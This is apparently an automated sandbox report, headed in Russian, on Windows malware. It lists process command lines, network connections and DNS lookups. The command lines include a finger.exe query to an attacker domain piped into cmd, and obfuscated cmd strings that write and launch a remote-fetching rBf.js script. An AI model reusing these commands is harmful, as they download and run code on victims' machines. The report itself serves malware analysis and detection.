Техническая информация
- '<SYSTEM32>\finger.exe' ok@uw7dvm3awr.cargasjamef.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\rBf.js"
- C:\users\public\rbf.js
- 'uw######wr.cargasjamef.xyz':79
- 'y2####.#umicubokmtb.golf':80
- 'cl###flare.com':443
- 'microsoft.com':80
- 'uw######wr.cargasjamef.xyz':79
- 'cl###flare.com':443
- DNS ASK uw######wr.cargasjamef.xyz
- DNS ASK y2####.#umicubokmtb.golf
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
- DNS ASK st####.rapidssl.com
- '<SYSTEM32>\cmd.exe' /c finger ok@uw7dvm3awr.cargasjamef.xyz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt CHRO=.j&&SEt GCIAS=vKabDarKabD a =KabD 'scKabDriKabDptKabD:'; b =KabD 'hKabDTtPKabD:'; GKabDetKabDObjKabDecKabDt(KabDa+b+'&&sET JW7G=QXOIOQXOIOy2iomr.dumicubokmtb.golfQXOIO?1QXOIO')...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p 9ZP1W="%GCIAS:KabD=%%JW7G:QXOIO=/%" 0<nul 1>C:\Users\Public\rBf%CHRO%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start C:\Users\Public\rBf%CHRO%s "
- '<SYSTEM32>\cmd.exe' /c start C:\Users\Public\rBf.js